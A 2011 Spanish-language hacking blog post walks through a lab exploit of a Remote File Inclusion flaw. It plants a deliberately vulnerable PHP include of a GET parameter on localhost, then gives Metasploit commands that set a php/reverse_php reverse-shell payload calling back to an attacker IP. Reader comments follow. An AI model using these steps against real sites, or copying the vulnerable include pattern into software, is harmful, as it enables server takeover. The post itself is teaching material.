2 mar. 2011

[Video Metasploit] Módulo Remote File Inclusion (RFI)

Una muestra más de que Metasploit sirve para explotar cualquier tipo de vulnerabilidad está aquí, un módulo de Metasploit para explotar RFIs.
RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().

Así que le pongo este lindo vídeo y más abajo la explicación de cada cosa que se hace en él ;)



Lo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php:
cd /var/www/html
mkdir 1
vi 1/index.php

Se agrega al archivo index.php el pedazo de código vulnerable:
<?php
 $color='blue';
 if (isset($_GET['COLOR']))
  $color = $_GET['COLOR'];
 require($color.'.php');
?>

O también puede ser este:
<?php
   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   include( $color . '.php' );
?>

De aquí en adelante pongo el comando y al lado entre corchetes [] la explicación:
chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache]
msfconsole [Echa a andar la consola de MSF]
use unix/webapp/php_include [Exploit que se va usar]
set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri]
set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)]
set RHOST localhost [IP o host del objetivo]
set PAYLOAD php/reverse_php [Elegimos un Payload]
set LHOST 172.16.61.132 [IP donde se conectará la víctima]
exploit [Echa a andar el exploit]
dir [Mira archivos en el directorio]
touch test.txt [Crea un archivo llamado test.txt]
echo Owned > test.txt [Escribe Owned dentro de test.txt]

[+] Eso era todo
[+] El vídeo lo saqué de http://www.securitytube.net/
[+] Si me equivoco en algo me avisan (no soy perfecto XD)
[+] Salu2
[+] ZioneR

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

6 Notaciones:

  1. ufff menos mal volviste
    extrañaba tus explicaciones (L) :P

    ResponderEliminar
  2. Tu blog está excelente, me gustaría enlazarte en mis sitios webs. Por mi parte te pediría un enlace hacia mis web y asi beneficiar ambas con mas visitas.

    espero tu respuesta a [email protected]

    un abrazoo

    Cate

    ResponderEliminar
  3. @Muñekita Cate

    http://www.blackploit.com/2010/06/afiliante-hacking-blackploit.html

    [+] Salu2
    [+] ZioneR

    ResponderEliminar
  4. la pagina quedo exelente, blackploit es de lo mejor ...

    ResponderEliminar
  5. ZioneR exelente aporte gracia a tu explicasiones estoy abansando en lo que se debe a seguridad en mis clase

    ZioneR y colaboradores quiero k me ayuden en los k se base en seguridad Citrix ya que tengo un servidor y an logrado hackiarmelo me gustaria que explique la bulnerabilidades que se pueden encontral en el gracias

    ResponderEliminar
  6. muy wenas a todos!! kisiera saber como crear un escritorio remoto en backtrack4R2 por favor o almenos saber si c puede o no hacer. muxisimas gracias!!

    ResponderEliminar

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.